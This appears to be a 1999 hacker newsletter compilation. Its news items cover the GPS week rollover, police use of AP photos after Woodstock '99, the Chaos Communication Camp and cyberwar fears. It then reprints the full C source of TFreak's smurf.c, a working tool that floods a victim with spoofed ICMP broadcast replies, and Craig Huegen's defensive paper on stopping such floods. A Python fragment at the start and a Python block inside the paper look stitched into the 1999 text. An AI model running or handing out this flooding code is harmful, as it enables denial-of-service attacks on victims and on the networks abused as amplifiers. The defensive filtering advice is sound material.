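    for day in (datetime(1999, 8, 21), datetime(1999, 8, 22)):
        w = broadcast_week(day)
        print(day.date(), "counter =", w,
              "naive ->", naive_decode(w).date(),
              "pivot ->", pivot_decode(w, build_date).date())
```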
National Park Service
http://www.nps.gov/pub_aff/features/gps_alert.htm

Wired
http://www.wired.com/news/news/technology/story/21098.html

Navstar GPS Joint Program Office
http://gps.laafb.af.mil

53.0 NY Police Face Possible Copyright Violations
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

The New York State Police has turned to the web in an effort to track down the alleged vandals who destroyed the Woodstock '99 site. The Police posted 10 photographs of the mayhem that had been taken by the Associated Press and asked the public to help identify people in the photos. The AP requested the photos be removed as soon as they knew about it.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,77278-122111-861061-0,00.html

Civic.com
http://www.civic.com/news/1999/august/civ-woodstock-8-4-99.html

New York State Police Web Site
http://www.troopers.state.ny.us/

New York police turn to Web for help in Woodstock crimes

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By JOHN KEKIS

ROME, N.Y. (August 3, 1999 12:00 a.m. EDT http://www.nandotimes.com) - New York State Police are turning to the Internet in an attempt to track down thieves and vandals who trashed the Woodstock '99 site. But their use of news photos without permission has raised other legal issues.

The State Police posted 14 photographs on its Web site, including 10 shot by Associated Press photographers. The AP protested as soon as it learned of the unauthorized use.

The photos show concertgoers breaking into pay phones, tearing down a 3-mile-long "Peace Wall," looting a vendor's truck and robbing an automated teller machine. The police ask the public for any additional photos and details of the identities of people shown.

Sam Boyle, chief of the AP's New York City Bureau, discussed the site with various officials on Monday.
"We have two concerns - violation of copyright and the journalistic separation from law enforcement," Boyle said.

The AP photos were put on the state police Web page on Friday, according to M.J. Edelman, Web master for the state police.

Monday morning, Lt. Jamie Mills of the public information office said the pictures would be taken off the site. Boyle then received calls from higher officials asking for permission to keep the pictures up, which he said could not be granted.

Glenn Valle, chief counsel for the state police, said his review indicated that there may not be an issue of copyright infringement.

"We don't think that we're violating the copyright or infringing on the copyright in this manner," Valle said. "It was material that was already published."

@HWA

54.0 Chaos Computer Club: Happy Hacker Campers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Geekstock: German Hackfest
~~~~~~~~~~~~~~~~~~~~~~~~~~

Wired News Report
3:00 a.m. 30.Jul.99.PDT

It's Internet World meets the Rainbow Gathering next week when geeks from around the world gather for a three-day camp out near Berlin.

Sponsored by German hacker group Chaos Computer Club (CCC), the event pits campers against each other in periodic hacking contests and gives proto-geeks a chance to see the light of day.

Pre-registration is already closed for the event, which will take place 6 to 8 August in Altlandsberg, near Berlin. However, according to the CCC site, those who want to show up at the event with DM150 (US$82) may slip under the 2,000-people limit.

The camp will be divided into theme villages, Burning Man style. Participants can choose the village that most represents their talents and interests, from lock-picking to re-engineering to cryptography.

Intermittent events like the Linux Deathmatch, a competition in which one team tries to hack another's network, will liven up bouts of partying, workshopping, and drinking at the CCC Leisure Lounge, and swimming on the nearby lake.
The CCC will provide electricity and an Ethernet for every tent. Campers are encouraged to bring their own computer equipment and can hook up to the specially created CAMPnet network or the Internet in their tents or in the CCC hackcenter. The grassroots event discourages press and commercial attendance. Business visitors -- defined in the FAQ as those who are "rich or working for a company or government that wants you at the Camp because there is a lot to learn or you have a certain commercial interest" -- are asked to pay an increased ticket price of DM1,500 (US$800). Hackers Happy Campers ~~~~~~~~~~~~~~~~~~~~~ by Steve Kettmann 3:00 a.m. 7.Aug.99.PDT BERLIN -- It takes countless hours cooped up indoors in front of a computer screen to truly appreciate the giddy mood at this weekend's three-day Chaos Communication Camp. By Friday evening, more than 1,400 hackers, encryptologists, computer visionaries, and assorted geeks had pitched their tents in a scenic lakeside field, and more were on their way. An afternoon of workshops gave way to a warm evening of lounging in front of tents, as people pounded away at keyboards and greeted acquaintances they had met only via networks or email. "It's a way to attach faces to email addresses," said John Gilmore, one of the founders of the San Francisco-based Cypherpunks. "It's a way to say, 'Hey, I know this person, we've been collaborating for years. Who are you?'" Like others at the event, Gilmore was headed in about four directions at once. That's how it goes when you put together thousands of smart, passionate people used to the isolated pursuit of their craft. Mass hacking, under the stars no less, was one of the activities. It took on an unlikely charm, especially given its location -- in the main tent next to a small, polished-silver spacecraft, a "shuttle" to Chaos' Heart of Gold Web site. 
This weekend's three-day event, the first of its kind in Germany, takes as its inspiration Hacking in Progress, a similarly organized hacking and technology festival that took place outside of Amsterdam two summers ago. "About 10 Cypherpunks went to HIP two years ago, and they came back with so many stories about how fun it was hanging out with people there. Also, they finished proofreading and typing in PGP, Pretty Good Privacy, a computer program that does encryption, so there was an international version," said Gilmore. "I didn't make it to HIP, but I resolved to go to the next one, and here I am. We have 15 or 20 people here, probably more than a dozen from the San Francisco Bay Area, and others scattered around from Berlin and Amsterdam and other parts of Europe. It's a real collegial, friendly sort of atmosphere. I'm meeting a lot of great people." The Berlin-based Chaos Computer Club, which organized the weekend, spent a year preparing for the meeting. That comes through in the atmosphere of crisp organization that seems to meld seamlessly with a spirit of fun -- the latter best summed up by comments like, "What's it like? I've never done pot before." "For me, this is more German than HIP," said Ine Poppe, a Dutch documentary filmmaker and artist who worked HIP as a journalist. "It's better organized. They learned a lot from the festivals before. "From my point of view, HIP had more of a scene of chaos: tents close together and cables all over the place and dance parties into the night. Maybe we will have those later." Kurt Seifried, a 22-year-old from Edmonton, Alberta, was roaming around the Cypherpunk tent with the exultant air of a student wrapping up finals week. "I gave a talk during one of the workshops and they didn't throw beer cans at me, so I guess it went all right," he said. "It was my first public speaking experience, so it was kind of scary. 
"The worst part was, they canceled the other workshop scheduled for the same time, so I looked up and about 100 people were streaming into the tent wanting to be entertained. It was like something out of Pink Floyd's The Wall."

Seifried's area of expertise is security, the yin to cracking's yang. His 177-page guide to Linux security is posted on the Web.

"It's encryption at network level to secure things, because right now the Internet is wide open, as people know. I came here to do that, and to network a little," he said.

Yet after the hacking and networking comes the relaxing, and the face-to-face conversations.

@HWA

55.0 Hackers and Cyberwar "The Threat of Chaos"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacker Sitings and News
8/7/99

Cyberwar: The Threat of Chaos

Hackers can disrupt, but can they make war?

Hackers and other cyber-vandals have become a major threat as the world's powers rely increasingly on their computers.

By Bob Sullivan
MSNBC

“WE HAVE NOTHING to fear but fear itself,” offered Franklin Roosevelt during the throes of the Great Depression. He might also have been talking about the Information Age, where the power of personal computers seems to offer limitless possibilities for both creativity and destruction.

Not true, the experts say — there are limits to the damage that can be done with zeros and ones. Experts like those at Bell Laboratories in New Jersey insist that image of a pimply-faced geek gaining control of Defense Department computers is pure science fiction. Even an organized “hack” by well-funded terrorist organizations who take control of a nuclear missile facility is fanciful, they say — and hardly worth the trouble. Not when it would be so much easier to create equal havoc using much simpler methods.

THINKING SMALL

‘We are the most technologically advanced country in the world, which means we have the most to lose.’
— FRANK CILLUFFO
Information warfare specialist

Imagine, for example, if the Internet suddenly stopped working.
A hacker group told Congress it could be done in half an hour. Or if power to major cities were disrupted. Government-hired hackers did that in four days in 1997. Or if parts of the 911 system were cut off. A Swedish hacker now in an asylum managed briefly to cut off 911 service in Florida two years ago. Such “nuisance” hacks on infrastructure are less dramatic than the hijacking of a missile, but they might be more effective. “The psychological impacts of IW (information warfare) can’t be overstated,” said Frank Cilluffo, director of the Information Warfare Task Force at the Center for Strategic and International Studies. “Using it, terrorist groups can achieve what they cannot militarily. “We are the most technologically advanced country in the world, which means we have the most to lose,” he added. “The United States is not very prepared to lose power, for example. And how long can you live without that database? What if suddenly all e-commerce were cut off?” TARGETING FINANCE Throw banking into that e-commerce category. During the Kosovo conflict, numerous reports suggested U.S. intelligence agencies had hired hackers to tinker with international bank accounts full of Yugoslav President Slobodan Milosevic’s money. There was plenty of debate in the security community about how possible this might be, but even the idea sent shudders through the financial industry. Once that Pandora’s box is open — once one government’s hackers are capable of freezing or altering personal bank account information — other governments and terrorist organizations surely would follow suit. And since the entire banking system is based on confidence, such an attack could completely undermine the integrity of the banking system, according to Kawika Daguio, executive vice president of the Financial Information Protection Association. THE MULTIPLIER EFFECT Cilluffo’s biggest concern is not an all-digital attack, but the use of computers as a multiplier for a more traditional attack. 
Imagine if a hacker had disabled 911 during the Oklahoma City bombing in 1995. Not only would medical help have been severely delayed, leading to more death and destruction — the resulting confusion would at least be demoralizing and, at worst, create a panic. For proof of the potential for mob psychology, experts point to the Y2K bug. Even with several years’ warning and continuous announcements that computers are Y2K-compliant, banks report cash hoarding has already begun, and survivalist-minded individuals are squirreling away water and dry goods. “The actual problem is usually 10 times less damaging than the public perception of it,” said Space Rogue, who runs the Hacker News Network service. The threat: real or not? There’s plenty of debate about how severe the cyberthreat is, though recent signals from the U.S. government suggest federal agencies are taking it very seriously. Just last week, The New York Times was leaked a document showing the National Security Council is working on a Big Brother-like electronic monitoring system called the “Federal Intrusion Detection Network.” The plan’s director told the Times: “We know” foreign governments are developing cyberwar capabilities, and “we have good reason to believe that terrorists may be developing similar capabilities.” ELIGIBLE RECEIVER The National Security Agency’s 1997 cyberwar “fire drill” may have inspired the study. In a military exercise code-named “Eligible Receiver,” 35 hackers hired by the NSA gained access to 36 of the 40,000 government networks within four days. They were able to gain control of major power grids and could have disrupted power in Los Angeles, Chicago, Washington and New York. But nothing nearly so sophisticated is required. In testimony to Congress last year, members of the hacker group L0pht said they could bring the Internet to its knees in less than an hour. “It is not difficult at all to fool, confuse or corrupt major [domain name] servers,” Dr. 
Mudge, who testified to Congress, told MSNBC. “There are many more interesting attacks that could be much more devastating, dealing with disrupting routing between major tier-one service providers (that is, stopping MCI from being able to talk to Sprintnet, etc.) and is completely feasible, doable with very little effort.” And the number of technologies that might be turned against the United States continues to expand with each high-tech invention, say several scientists at U.S. high-tech labs. Among the most frightening are the advent of MEMS — micro-electro-mechanical systems. These tiny machines, potentially smaller than a human cell, may one day be injected into the bloodstream as miniature doctors sent to beat back viruses or kill cancerous cells. But they could just as easily be designed as a lethal combination of high-tech and biological warfare, as smart MEMS could be set to infect and kill specific kinds of subjects. Irrational fears? Not everyone is persuaded the threat is all that dramatic. After all, hackers did not gain access to the Pentagon’s most secure systems. InfoWar.com founder Louis Cipher (a pseudonym) says Eligible Receiver and other high-profile cyber-threat incidents are part publicity stunt aimed at getting more federal money targeted to cyberwarfare research. “Paranoia is a bad thing, and America is being infected quickly,” Cipher said. “Everybody’s an alarmist.... You can disturb an infrastructure. Can go into telephony and can cause disturbance, a denial of service. But disturbing electrical facilities is difficult. Just like on a railroad, they can go from track to track. There are a lot of safeguards.” And despite all the conjecture about cyberwar capabilities, there’s little evidence it has actually been used. In fact, even if the ability to take out power grids with a computer is out there, U.S. forces apparently showed a distinct reluctance to use the ability during the Kosovo conflict. 
So-called “soft bombs,” which short out electric lines, were used to create local power disruptions instead of a computer-based attack.

That satisfies Cilluffo, who thinks the United States should hold off crossing the line to cyberwar for as long as possible.

“A well-placed bomb may still be easier,” Cilluffo said. “If we can go through physical means, then we are not compromising a technique that could be used against us.... After all, we have a lot more to lose.”

Bob Sullivan covers Internet issues for MSNBC.com

@HWA

56.0 LOCKDOWN 2000
~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Saturday 7th August 1999 on 4:50 pm CET

New version of Lockdown 2000 has been released - Lockdown 2000 3.0.1.31. In this version some bugs are repaired (this build fixes all error messages that some Windows 95/98 users had on close and shutdown, fixes the manual scanner bug and many more new trojan signatures are added - the current number of trojan versions which it detects is 301). More information on the website (www.lockdown2000.com).

@HWA

57.0 The SMURF attack and smurf amplifiers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contrary to popular belief, SMURF attacks are still very much in use and remain a threat to ISPs and users alike. The reason is that, no matter how much you yell, certain badly maintained networks STILL continue to act as SMURF AMPLIFIERS. A plain smurf basically elicits a ping response from several hundred machines with a spoofed address and a target return address; a SMURF AMPLIFIER responds more than once to the ping, in some cases several (as many as 10 or more) times. These nets are targeted by the smurfer for use against the target site... Here's a brief description of smurfs and a list of networks that are acting as smurf amplifiers as of this writing, with URLs on where to go to find current stats.
- Ed

SMURF.C by TFreak

Well, I suppose it's `safe' to release this, it seems everyone and their dog has it and apparently (and to my surprise) it still works.

The `smurf' attack is quite simple. It has a list of broadcast addresses which it stores into an array, and sends a spoofed icmp echo request to each of those addresses in series and starts again. The result is a devastating attack upon the spoofed ip with, depending on the amount of broadcast addresses used, many, many computers responding to the echo request.

Before I continue may I first say that this code was a mistake. When it was written I was not aware of the fact that a) the world would get its hands on it and b) it would have such a destructive effect on the computers being used to flood. My ignorance is my mistake. I extremely regret writing this, but as you well know, if things aren't `exploited' then they aren't fixed.

Now that that's cleared up, how do you protect your network? Well, unfortunately I am not sure how or even if it is possible to protect yourself from being hit with it, unless you wanted to deny all incoming icmp traffic at the router which isn't the best solution as it renders other useful oddities (such as ping and traceroute) unusable.

To prevent your network from being used to flood (using up almost all your bandwidth therefore creating a denial of service upon yourself.. technically) is quite easy and not a great loss to your network. If you filter all incoming icmp traffic to the broadcast address at the router none of the machines will respond therefore the attack will not work. This can be done with one line in the router, and I believe a rep from texas.net posted the solution for this (perhaps it could be reposted?). I believe MCI is currently working on a patch or detector of some kind for it, which is available at http://www.internetnews.com/isp-news/1997/10/0901-mci.html

Please, patch your networks, if there's nothing to flood with then there's no flood.
Respectfully, TFreak --- 8< smurf4.c >8 --- /* * * $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $ * * spoofs icmp packets from a host to various broadcast addresses resulting * in multiple replies to that host from a single packet. * * mad head to: * nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig, * MissSatan for swallowing, napster for pimping my sister, the guy that * invented vaseline, fyber for trying, knowy, old school #havok, kain * cos he rox my sox, zuez, toxik, robocod, and everyone else that i might * have missed (you know who you are). * * hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy * thing he is (he's -almost- as stubborn as me, still i managed to pick up * half the cheque). * * and a special hi to Todd, face it dude, you're fucking awesome. * * mad anal to: * #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps * because they plain suck, Rolex for being a twit, everyone that * trades warez, Caren for being a lesbian hoe, AcidKill for being her * partner, #cha0s, sedriss for having an ego in inverse proportion to * his penis and anyone that can't pee standing up -- you don't know what * your missing out on. * * and anyone thats ripped my code (diff smurf.c axcast.c is rather * interesting). * * and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill * Robbins for trying to steal my girlfriend. Not only did you show me * no respect but you're a manipulating prick who tried to take away the * most important thing in the world to me with no guilt whatsoever, and * for that I wish you nothing but pain. Die. * * disclaimer: * I cannot and will not be held responsible nor legally bound for the * malicious activities of individuals who come into possession of this * program and I refuse to provide help or support of any kind and do NOT * condone use of this program to deny service to anyone or any machine. * This is for educational use only. Please Don't abuse this. 
* * Well, i really, really, hate this code, but yet here I am creating another * disgusting version of it. Odd, indeed. So why did I write it? Well, I, * like most programmers don't like seeing bugs in their code. I saw a few * things that should have been done better or needed fixing so I fixed * them. -shrug-, programming for me as always seemed to take the pain away * ... * * */ #include #include #include #include #include #include #include #include #include #include #include #include #include void banner(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); unsigned short in_chksum(u_short *, int); /* stamp */ char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $"; int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *bcastfile; int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192); banner(); signal(SIGINT, ctrlc); if (argc < 6) usage(argv[0]); if ((he = gethostbyname(argv[1])) == NULL) { perror("resolving source host"); exit(-1); } memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(0); num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]); if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1); } x = 0; while (!feof(bcastfile)) { fgets(buf, 32, bcastfile); if (buf[0] == '#' || buf[0] == '\n' || ! 
isdigit(buf[0])) continue; for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++; } bcastaddr[x] = 0x0; fclose(bcastfile); if (x == 0) { fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); exit(-1); } if (pktsize > 1024) { fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1); } if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast)); printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (i = 0; i < num || !num; i++) { if (!(i % 25)) { printf("."); fflush(stdout); } smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++; if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay); } puts("\n\n"); return 0; } void banner (void) { puts("\nsmurf.c v4.0 by TFreak\n"); } void usage (char *prog) { fprintf(stderr, "usage: %s " " \n\n" "target = address to hit\n" "bcast file = file to read broadcast addresses from\n" "num packets = number of packets to send (0 = flood)\n" "packet delay = wait between each packet (in ms)\n" "packet size = size of packet (< 1024)\n\n", prog); exit(-1); } void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip; struct icmphdr *icmp; char *packet; packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip = (struct iphdr *)packet; icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->ihl = 5; ip->version = 4; ip->ttl = 255; ip->tos = 0; ip->frag_off = 0; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = dest; ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp->code = 0; icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); sendto(sock, 
packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); free(packet); /* free willy! */ } void ctrlc (int ignored) { puts("\nDone!\n"); exit(1); } unsigned short in_chksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); }

--------------------------------------------------------------------------------

Along these same lines, Craig Huegen has written up some documentation that gives an in-depth explanation of smurfing and prevention measures at http://www.quadrunner.com/~c-huegen/smurf.txt

From the web page:

---------------------------------------------------

THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING"
DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS

Craig A. Huegen
chuegen@quadrunner.com

Last Update: Fri Oct 10 12:20 PDT

New additions:
* More minor corrections
* Added MCI's DoSTracker program (announced at N+I 10/9/97)
* Changed "helpers" to "bounce sites" (kcooper@bbnplanet.com)
* Added preliminary information about Bay Networks routers (jcgreen@netins.net)
* Added further information about Proteon/OpenROUTE routers (dts@senie.com)

Editor's plea: *please* distribute this information freely, and abide by my redistribution requirements (see the very end) when doing so. It's important that these attacks be minimized, and communication is the only way to help with this.

OVERVIEW:

The information here provides in-depth information regarding "smurf" attacks, with a focus on Cisco routers and how to reduce the effects of the attack. Some information is general and not related to an organization's particular vendor of choice; however, it is written with a Cisco router focus.
No confirmation has been made to the effects on other vendors' equipment; however, others have provided me with information for various vendors, which is provided in the document. See the "Acknowledgements" section below for the sources and contact information. I am happy to accept information from other colleagues who are willing to provide information about other vendors' products in relation to this topic.

This paper is always being updated as I receive more information about attacks and work with ways to minimize impact.

DESCRIPTION:

The "smurf" attack, named after its exploit program, is the most recent in the category of network-level attacks against hosts. A perpetrator sends a large amount of ICMP echo (ping) traffic at broadcast addresses, all of it having a spoofed source address of a victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function noted below, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply each, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, there could potentially be hundreds of machines to reply to each packet.

Currently, the providers/machines most commonly hit are IRC servers and their providers.

There are two parties who are hurt by this attack... the intermediary (broadcast) devices--let's call them "bounce sites", and the spoofed address target, or the "victim". The victim is the target of a large amount of traffic that the bounce sites generate.

Let's look at the scenario to paint a picture of the dangerous nature of this attack. Assume a co-location switched network with 100 hosts, and that the attacker has a T1. The attacker sends, say, a 768kb/s stream of ICMP echo (ping) packets, with a spoofed source address of the victim, to the broadcast address of the "bounce site".
These ping packets hit the bounce site's broadcast network of 100 hosts; each of them takes the packet and responds to it, creating 100 ping replies outbound. If you multiply the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce site" after the traffic is multiplied. This is then sent to the victim (the spoofed source of the originating packets).

HOW TO KEEP YOUR SITE FROM BEING THE SOURCE PERPETRATORS USE TO ATTACK VICTIMS:

The perpetrators of these attacks rely on the ability to source spoofed packets to the "bounce sites" in order to generate the traffic which causes the denial of service.

In order to stop this, all networks should perform filtering either at the edge of the network where customers connect (access layer) or at the edge of the network with connections to the upstream providers.

Paul Ferguson of cisco Systems and Daniel Senie of Daniel Senie consulting have written an Internet-draft pertaining to this topic. See:

ftp://ftp.internic.net/internet-drafts/draft-ferguson-ingress-filtering-02.txt

for more information on this subject. The authors expect to have it published as an Informational RFC prior to the December IETF meeting.

HOW TO STOP BEING AN INTERMEDIARY:

This attack relies on the router serving a large multi-access broadcast network to frame an IP broadcast address (such as 10.255.255.255) into a layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF). The RFC for routing states that a router MAY perform this translation for directed broadcasts. Because in a few select cases it is desirable, and it hasn't been proved undesirable (except in the recent DoS attacks), most vendors have chosen to implement this behavior. Generally, with IP providers and the Internet as we know it today, this behavior should not be needed.

(Editor's note: I welcome other examples where this is needed in today's networking--see below for a single example I know of.)
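The two checks this part of the paper relies on, as an added Python example (not from Huegen's paper or any vendor's code): the access-edge ingress filter on source addresses, and the bounce-site test for echo requests aimed at a LAN broadcast address, with the reply volume that forwarding them would produce. All prefixes, host counts, addresses and packets are constructed sample data.

```python
import ipaddress
from collections import Counter
from typing import NamedTuple

ICMP_ECHO_REQUEST = 8  # ICMP type of a ping request


class Packet(NamedTuple):
    src: str        # source address as written in the IP header
    dst: str        # destination address
    icmp_type: int
    length: int     # datagram length in bytes


def violates_ingress_filter(pkt, assigned_prefixes):
    """Access-edge check: a customer may only source packets from the
    prefixes assigned to it; any other source address is spoofed."""
    src = ipaddress.ip_address(pkt.src)
    return not any(src in net for net in assigned_prefixes)


def directed_broadcast_lan(pkt, lans):
    """Bounce-site check: return the local LAN whose broadcast address an
    ICMP echo request is aimed at, or None. The all-zeros host address is
    matched too, because some older IP stacks treat it as a broadcast."""
    if pkt.icmp_type != ICMP_ECHO_REQUEST:
        return None
    dst = ipaddress.ip_address(pkt.dst)
    for net in lans:
        if dst in (net.broadcast_address, net.network_address):
            return net
    return None


def reflected_bps(inbound_bps, responders):
    """Reply rate leaving the bounce site: every responding host answers
    every request, so the inbound rate is multiplied by the host count."""
    return inbound_bps * responders


def bounce_site_exposure(packets, lan_hosts):
    """Total the reply bytes each claimed source would receive if the router
    forwarded the directed broadcasts. lan_hosts maps each local LAN
    (an ip_network) to the number of hosts that would answer."""
    reply_bytes = Counter()
    for pkt in packets:
        lan = directed_broadcast_lan(pkt, lan_hosts)
        if lan is not None:
            reply_bytes[pkt.src] += pkt.length * lan_hosts[lan]
    return dict(reply_bytes)


# --- constructed sample data (not from the paper) ---------------------------
CUSTOMER_PREFIXES = [ipaddress.ip_network("198.51.100.0/24")]
LAN_HOSTS = {
    ipaddress.ip_network("10.1.1.0/24"): 100,
    ipaddress.ip_network("10.1.2.0/25"): 40,
}
VICTIM = "203.0.113.9"
SAMPLE = [
    Packet(VICTIM, "10.1.1.255", 8, 92),          # request to the /24 broadcast
    Packet(VICTIM, "10.1.2.127", 8, 92),          # request to the /25 broadcast
    Packet(VICTIM, "10.1.2.255", 8, 92),          # not a broadcast of any local LAN
    Packet("198.51.100.7", "10.1.1.20", 8, 92),   # ordinary unicast ping
    Packet("198.51.100.7", "10.1.1.255", 0, 92),  # echo reply, not a request
]

if __name__ == "__main__":
    for claimed_src, nbytes in bounce_site_exposure(SAMPLE, LAN_HOSTS).items():
        print(f"{claimed_src}: {nbytes} reply bytes if directed broadcasts are forwarded")
    print("paper's scenario:", reflected_bps(768_000, 100), "bit/s outbound")
```

The /25 case shows why the test has to use the real prefix length: 10.1.2.127 is a broadcast address on that LAN while 10.1.2.255 is not.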
Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen to a select number of addresses in normal operation. The one MAC address that all devices share in common in normal operation is the media broadcast, or FF:FF:FF:FF:FF:FF. In this case, a device will take the packet and send an interrupt for processing.

Because most host IP stacks pay little attention to the destination address in the IP header of an ICMP packet, or (if they check the IP header for ICMP) implement responding to ICMP broadcasts, the packet is handed to the ICMP layer, where in the case of smurf attacks, an ICMP echo reply is prepared and shipped out to the spoofed address source of the packet-- the victim.

To stop your Cisco router from converting these layer 3 broadcasts into layer 2 broadcasts, use the "no ip directed-broadcast" interface configuration command. This should be configured on all routers which provide routing to large multi-access broadcast networks (generally LANs), with more than 5-10 devices. It is unnecessary on point-to-point interfaces, such as POS, serial T1, HSSI, etc., because point-to-point interfaces will only generate two replies--one for each end of the link. No testing has been done on multipoint frame-relay; routers on NBMA networks typically do not forward broadcasts unless explicitly configured to do so. Point-to-point sub-interface models will behave like many point-to-point links--again, this command will have little effect, stopping only one of the two replies.

Other vendor information:

* Proteon/OpenROUTE: Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks routers have an option to turn off directed broadcasts in the IP Configuration menus. The command sequence to turn them off is:

      *CONFIG (on newer routers) or TALK 6 (on older routers)
      Config>PROTOCOL IP
      IP Config>DISABLE DIRECTED-BROADCAST

  A restart of the router is then required.
* Bay Networks: Jon Green (jcgreen@netins.net) reports that under current code, there is no way to keep Bay Networks routers from converting layer 3 broadcasts to layer 2 broadcasts short of applying a per-interface filter, eliminating packets to the broadcast. However, there is a feature request to add a configuration option, and it is expected to be in BayRS version 12.0.

There is one case study where this will stop intended behavior: In the case where samba (an SMB server for UNIX) or NT is used to "remote broadcast" into a LAN workgroup so that the workstations on that LAN can see the server, this will prevent the LAN machines from seeing the remote server. This is *only* in the case where there is no WINS server (WINS is routed unicast) and a "remote broadcast" is being used--it's a rare but notable condition.

INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS:

The amount of bandwidth and packets per second (pps) that can be generated by this attack is quite large. With a 200-host LAN, I was able to generate over 80 Mbits/sec traffic at around 35 Kpps toward my target--a pretty significant amount. The victims receive this because traffic is multiplied by the number of hosts on the broadcast network used (in this case, with a 200-host network, I was only required to send 400 Kbits/sec to the broadcast address--less than one-third of a T1).

Many hosts cannot process this many packets per second; many hosts are connected to 10 Mbit/sec Ethernet LANs where more traffic than wire speed is sent. Therefore, the ability to drop these packets at the network border, or even before it flows down the ingress pipes, is desired.

(This next section assumes IOS behavior with standard central switching-- FIB/CEF isn't covered here, the behavior is different, I believe.)

Cisco routers have several "paths" which packets can take to be routed; each has a varying degree of overhead. The slowest of these is "process" switching.
This is used when a complex task is required for processing packets. The other modes are variations of a fast path--each of them with a set of advantages and disadvantages. However, they're all handled at interrupt level (no process-level time is required to push these packets).

In IOS versions (even the most recent), access-list denies are handled at the process (slow) level, because they require an ICMP unreachable to be generated to the originating host. All packets were sent to the process level automatically to be handled this way.

Under a recent code change (Cisco bug ID CSCdj35407--integrated in version 11.1(14)CA and later), packets denied by an access-list will be dropped at the interrupt (fast) level, with the exception of 2 packets per second per access-list deny line. These 2 packets per second will be used to send the "ICMP unreachable via administrative block" messages. This assumes that you don't want to log the access-list violations (via the "log" or "log-input" keywords). The ability to rate-limit "log-input" access-list lines (in order to more easily log these packets) is currently being integrated; see the section below on tracing spoofed packet attacks for information on logging.

Filtering ICMP echo reply packets destined for your high-profile machines at the ingress interfaces of the network border routers will then permit the packets to be dropped at the earliest possible point. However, it does not mean that the network access pipes won't fill, as the packets will still come down the pipe to be dropped at the router. It will, however, take the load off the system being attacked. Keep in mind that this also denies others from being able to ping from that machine (the replies will never reach the machine).

For those customers of providers who use Cisco, this may give you some leverage with the providers' security teams to help save your pipes by filtering before the traffic is sent to you.
Efforts are underway to integrate these fixes in the other major versions and branches as well.

TRACING SPOOFED PACKET STREAMS:

Tracking these attacks can prove to be difficult, but is possible with coordination and cooperation from providers. This section also assumes Cisco routers, because I can speak only about the abilities of Cisco to log/filter packets and what impact it may have.

Today, logging packets which pass through or get dropped in an ACL is possible; however, all packets with the "log" or "log-input" ACL options are sent to process level for logging. For a large stream of packets, this could cause excessive CPU problems. For this reason, tracking attacks via IOS logging today is limited to lower bandwidth attacks (smaller than 10k packets per second). Even then, the number of log messages generated by the router could overload a syslog server.

Cisco bug ID CSCdj35856 addresses this problem. It has been integrated into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a maintenance interim release), and makes it possible to log packets at defined intervals and to process logged packets not at that interval in the fast path. I will update this page with version numbers as the releases are integrated.

Some information on logging:

